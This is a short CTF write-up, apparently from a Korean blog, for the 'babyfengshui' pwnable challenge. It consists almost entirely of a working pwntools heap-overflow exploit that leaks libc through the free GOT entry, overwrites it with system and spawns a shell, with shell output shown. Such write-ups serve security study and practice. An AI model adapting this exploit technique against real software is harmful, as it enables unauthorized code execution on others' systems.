Category : pwnable
Summary : heap overflow
Exploit
#!/usr/bin/python
from pwn import *
def cmd_add(alloc_size, input_size, name, data):
ru('Action')
sl(str(0))
ru('size of description: ')
sl(str(alloc_size))
ru('name: ')
sl(name)
ru('text length: ')
sl(str(input_size))
ru('text: ')
sl(data)
def cmd_del(idx):
ru('Action')
sl(str(1))
ru('index: ')
sl(str(idx))
def cmd_show(idx):
ru('Action')
sl(str(2))
ru('index: ')
sl(str(idx))
ru('name: ')
name = rl(False)
ru('description: ')
desc = rl(False)
return name, desc
def cmd_update(idx, input_size, data):
ru('Action')
sl(str(3))
ru('index: ')
sl(str(idx))
ru('text length: ')
sl(str(input_size))
ru('text: ')
sl(data)
free_got = 0x0804b010
s = process('./babyfengshui')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
cmd_add(0x20, 0x20, 'name', 'desc')
cmd_add(0x10, 0x10, 'overwriteme', 'desc2')
cmd_add(0x20, 0x20, 'name3', 'desc3')
cmd_add(0x100, 0x100, 'name4', 'sh')
cmd_del(0)
cmd_del(2)
pay = ''
pay += 'a' * 0x80
pay += p32(0) + p32(0x19)
pay += 'a' * 0x10
pay += p32(0) + p32(0x89)
pay += p32(free_got)
pay += 'overwriteok'
cmd_add(0x80, len(pay), 'name', pay)
_, leak = cmd_show(1)
libc_base = u32(leak[0:4]) - 0x70750
libc_system = libc_base + 0x3a940
cmd_update(1, 4, p32(libc_system))
cmd_del(3)
s.interactive()
s.close()
$ python ex.py
[+] Starting local process './babyfengshui': pid 128654
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)
'CTF > 2016' 카테고리의 다른 글
| 33C3 CTF - grunt (0) | 2018.12.14 |
|---|---|
| 33C3 CTF - tea (0) | 2018.12.14 |
| 33C3 CTF - rec (0) | 2018.12.14 |
| SECCON CTF QUAL 2016 - jmper (1) | 2017.01.02 |
| SECCON CTF QUAL 2016 - checker (0) | 2017.01.02 |
